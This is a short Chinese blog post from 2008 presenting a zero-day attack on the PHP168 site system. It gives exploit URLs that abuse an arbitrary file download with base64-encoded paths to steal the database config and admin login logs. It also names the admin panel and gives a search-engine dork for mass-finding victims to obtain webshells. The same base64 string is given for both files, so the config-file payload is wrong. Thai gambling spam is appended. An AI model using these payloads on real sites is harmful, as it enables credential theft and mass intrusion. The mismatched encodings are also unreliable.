PHP168(漏洞)整站系统0DAY
2008年11月8日星期六 | | || 首先说明下是这个洞是在其他地方看到的,只是他没有说的很清楚,好多菜菜都不明白,我就拿这发我的第一个贴吧! 这个洞其实就是利用了程序的编码漏洞,下载配置和登陆日志文件,一下是利用方法。 下载 mysql_config.php 和 adminlogin_logs.php 两个文件到本地。 http://dabei.org//job.php?job=download&url="aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA==" http://dabei.org//job.php?job=download&url="aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA==" 程序后台:http://dabei.org/admin/index.php?iframe=1 Base64加密代码: http://dabei.org//cache/adminlogin_logs.php == "aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA==" (引号里面的是Base64加密后的) http://dabei.org//php168/mysql_config.php == "aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA==" (引号里面的是Base64加密后的) 批量抓webshell: google,baidu 输入关键字:Powered by PHP168 |
博文
pg สล็อต เว็บตรง ขั้นต่ำ 1 บาท แตกง่าย ผู้เล่นสามารถเพลิดเพลินไปกับเกมสล็อต PG ได้อย่างมั่นใจและอุ่นใจที่ได้เข้าร่วมการเดิมพันในเว็บไซต์เชิญชวนนี้ได้เสมอ